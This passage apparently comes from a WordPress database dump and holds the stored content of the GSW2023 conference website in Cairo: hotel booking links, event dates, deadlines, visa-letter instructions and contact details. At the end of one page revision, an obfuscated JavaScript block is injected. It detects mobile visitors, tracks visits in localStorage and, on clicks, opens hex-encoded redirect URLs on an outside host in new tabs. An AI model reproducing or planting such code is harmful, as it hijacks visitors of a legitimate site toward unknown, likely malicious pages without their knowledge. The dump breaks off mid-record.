center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-09-04 13:35:50','2023-09-04 13:35:50','',3066,'https://gsw2023.com/?p=5458',0,'revision','',0),
(5460,1,'2023-09-16 22:41:12','2023-09-04 13:40:47','','Awards','','publish','closed','closed','','awards','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=5460',37,'nav_menu_item','',0),
(5461,1,'2023-09-05 15:53:12','2023-09-05 15:53:12','[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 